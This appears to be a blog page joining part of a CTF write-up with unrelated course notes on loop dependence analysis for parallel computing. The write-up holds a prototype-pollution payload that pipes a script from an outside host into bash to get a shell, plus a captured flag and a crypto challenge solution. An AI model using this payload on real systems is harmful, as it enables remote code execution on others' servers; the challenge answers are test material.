    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

Get the flag from /var/html/code/flag:

flag{8c46c34a-fa1f-4fc9-81bd-609b1aafff8a}

Crypto

boom

image-20200510231932335

just play a simple game

image-20200510231952896

md5:en5oy

image-20200510232016920

stupid z=31,y=68, x=74

image-20200510232038249

stupid Mathemetica.

image-20200510232104887

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is solve \(m^f\equiv c \pmod n\) for the exponent \(f\).

\(n\) is actually \(2^{512}\).

This is just another modular-arithmetic (discrete-log) problem, like "点鞭炮", and the technique can be found on Stack Overflow.
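A sketch of the intended attack with small made-up numbers (the real challenge uses \(k=512\)): the multiplicative group mod \(2^k\) has smooth (power-of-two) order, so the discrete log can be lifted one bit at a time, assuming the base satisfies \(m \equiv 3\) or \(5 \pmod 8\) so that it has maximal order \(2^{k-2}\).

```python
def dlog_mod_2k(m, c, k):
    # Solve m**x ≡ c (mod 2**k) bit by bit (Pohlig-Hellman-style lifting).
    # Assumes m ≡ 3 or 5 (mod 8), i.e. m has maximal order 2**(k-2),
    # and that c lies in the subgroup generated by m.
    x = 0
    for j in range(3, k + 1):
        # Fix bit (j-3) of x so the congruence holds modulo 2**j
        if pow(m, x, 1 << j) != c % (1 << j):
            x += 1 << (j - 3)
    return x

# Sanity check with an invented secret exponent (k = 64 instead of 512)
k, m, secret = 64, 5, 0xDEADBEEF
c = pow(m, secret, 1 << k)
x = dlog_mod_2k(m, c, k)
assert pow(m, x, 1 << k) == c
assert x == secret % (1 << (k - 2))   # exponent recovered modulo 2**(k-2)
print(hex(x))  # 0xdeadbeef
```

Note the exponent is only recoverable modulo \(2^{k-2}\), which is enough here since the flag is shorter than that.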

Reflection

We have to practice more and collaborate more!

[Parallel Computing] Loop dependence analysis

Intro

shared memory algorithm design

image-20200505182020225

For non-shared-memory algorithms, we have to use barriers to get data transferred between processes.

image-20200505182116133

For shared-memory algorithms, we first decide which parts of the task share memory heavily, then insert the appropriate OpenMP or MPI directives.

Design considerations

The two main design considerations are data dependence and load balance, so we apply the following steps:

  • data dependence analysis
  • static or dynamic, and block or cyclic, work assignment
  • variable specification: shared, private, or reduction, and row-wise or column-wise mapping
    • shared variables cause cache-coherence traffic and much lower performance
    • private and reduction variables don't need synchronization
    • dimension mapping depends mostly on cache locality

Main Consideration for data dependence analysis

RAW & WAR & WAW

All of these hazards must be avoided, even though some interleavings may happen to produce correct results.

The goal is to run all dependent operations on the same processor.

loop dependence analysis

  • loop-carried dependence
    • dependence exists across different iterations of loop
  • loop-independent dependence
    • dependence exists within the same iteration of loop
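A quick illustration of the two cases (in Python for brevity): the second loop below carries a true (RAW) dependence across iterations, so they cannot be reordered or split across processors freely, while the first loop's iterations are fully independent.

```python
import numpy as np

b = np.arange(1, 9, dtype=float)

# Loop-independent: each iteration touches only its own index -> parallelizable
c = np.empty_like(b)
for i in range(len(b)):
    c[i] = 2 * b[i]

# Loop-carried (true/RAW) dependence: iteration i reads what iteration i-1 wrote,
# so the iterations must execute in order
a = np.zeros_like(b)
a[0] = b[0]
for i in range(1, len(b)):
    a[i] = a[i - 1] + b[i]

assert np.array_equal(c, 2 * b)         # order-insensitive result
assert np.array_equal(a, np.cumsum(b))  # result depends on iteration order
print(a)  # [ 1.  3.  6. 10. 15. 21. 28. 36.]
```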

example

image-20200505191450951

iteration-space traversal graph (ITG)

  • iteration-space traversal graph is a line graph showing the order of traversal in the iteration space.
  • image-20200505192641248

loop-carried dependence graph (LDG)

  • Given the ITG, can determine the dependence between different loops.
  • Loop-carried Dependence Graph (LDG) shows the loop-carried true/anti/output dependence relationships.
  • Node in LDG is a point in the iteration space.
  • Directed edge in LDG is the dependence.
  • LDG helps identify parts of the loop that can be done in parallel.

examples

image-20200505193459997
image-20200505193641884
image-20200505193657284
image-20200505194356931
image-20200505194556118

 

Distance and direction vector

image-20200505194745834
image-20200505195031615

Loop

image-20200505195226568
image-20200505195950287
image-20200505204740523
image-20200505204811678

Algorithm analysis

image-20200505205040713